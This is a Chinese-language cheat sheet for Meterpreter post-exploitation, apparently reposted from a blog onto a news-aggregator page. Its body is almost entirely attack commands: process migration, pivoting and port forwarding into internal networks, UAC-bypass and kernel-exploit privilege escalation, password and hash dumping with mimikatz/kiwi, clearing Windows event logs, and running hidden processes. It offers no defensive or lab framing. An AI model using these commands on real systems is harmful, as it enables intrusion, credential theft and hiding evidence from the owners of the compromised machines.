最新要闻

广告

手机

iphone11大小尺寸是多少?苹果iPhone11和iPhone13的区别是什么?

iphone11大小尺寸是多少?苹果iPhone11和iPhone13的区别是什么?

警方通报辅警执法直播中被撞飞:犯罪嫌疑人已投案

警方通报辅警执法直播中被撞飞:犯罪嫌疑人已投案

家电

观点:meterpreter后渗透攻击

来源:博客园

Meterpreter后渗透

msf提供了非常强大的后渗透工具-meterpreter.获取目标机的meterpreter后有以下优势


(资料图片)

  • 纯内存工作模式
  • 加密通信协议,而且同时与几个通道通信
  • 攻击进程内工作,多进程内迁移
  • 平台互通

进程迁移

通过浏览器的shell可能是一个脆弱的shell,将shell和一个稳定的进程绑定到一起,就不需要对磁盘进行任何写入操作.

1.meterpreter手工迁移

getpid命令查看自己的pid是多少#迁移进程 找到一些比较经常出现在进程而且较稳定的服务进行迁移migrate pid#原本的进程会自动关闭,为了确保不存在最好再使用kill -9 pid强制删除

2.msf利用模块迁移

run post/windows/manage/migrate

系统命令

1.收集系统信息

sysinfo

2.查看网络设置

route

3.查看当前权限

getuid

4.查看网络结构

先进行跳转,输入background将meterpreter中断隐藏在后台

route add命令添加路由,

meterpreter > background  backgrounding session 1 . . .msf > route add 192.168.1.0 255.255.255.0 1(session 1的意思)msf > route printactive routing tablesubnet      netmask    gateway192.168.1.0   255.255.255.0  session 1

网络类命令

ipconfig/ifconfigarp -anetstat -ano getproxy    #查看代理信息route      #路由

端口转发

portfwd add -l 6666 -p 3389 - r 127.0.0.1    #将目标机的3389端口转发到本地6666端口

autoroute添加路由

run get_local_subnetsrun autoroute -s 192.168.1.0/24    #添加到目标环境网络run autoroute -p     #查看添加的路由

socks4a代理

autoroute添加完路由后,利用msf自带的socks4a代理

msf > use auxiliary/server/socks4amsf > set srvhost 127.0.0.1msf > set srvport 1080msf > runvi /etc/proxychains.conf    socks4 127.0.0.1 1080

利用proxichains 访问

提权

getsystem提权

bypassuac提权

search bypassuac有以下几个

use exploit/windows/local/bypassuacuse exploit/windows/local/bypassuac_injectionuse windows/local/bypassuac_vbsuse windows/local/ask

例如:

msf > use exploit/windows/local/bypassuacmsf > set SESSION 2msf > run

再次执行getsystem获取系统权限

内核漏洞提权

先用enum_patches收集补丁信息,查找可用的exploit进行提权

search enum_patches

meterpreter > run post/windows/gather/enum_patches    #查看补丁信息msf > use exploit/windows/localms13_053_schlampereimsf  > set session 2msf > exploit

文件系统命令

1.查看当前处于目标机的哪个目录

pwd / getwd

getlwd:查看当前处于本地的某个目录

ls:列出当前目录所有文件

2.搜索指定类型的文件

search -f *.txt -d c:\

-f 用于指定搜索文件  -d 指定哪个目录下进行搜索

3.下载文件

download 目标机文件 攻击机目录

download c:\test.txt /root

4.上传文件

upload 攻击机文件 目标机路径

5在目标机切换目录

lcd /tmp    #操作攻击者主机 切换目录

抓密码

mimikatz抓

load kiwicreds_all
1.hashdump2.run windows/gather/smart_hashdump3.run windows/gather/credentials/windows_autologin

清除日志

clearev  #清除windows中的应用程序日志、系统日志、安全日志

执行文件

execute #在目标机中执行文件execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互

获得shell以后的获取敏感文件操作

判断是否为多网卡机器扫描其他网段

尽量收集机器上的敏感信息,敏感内部文件,账号密码本等

1.抓取自动登录的密码

run windows/gather/credentials/windows_autologin  #抓取用户存储的自动登录账户密码

2导出密码hash

hashdump

3.查看权限后,抓取密码

getuid
#load mimikatz开启功能 / load kiwicreds_all  #抓取密码 retrieving all credentials

关键词: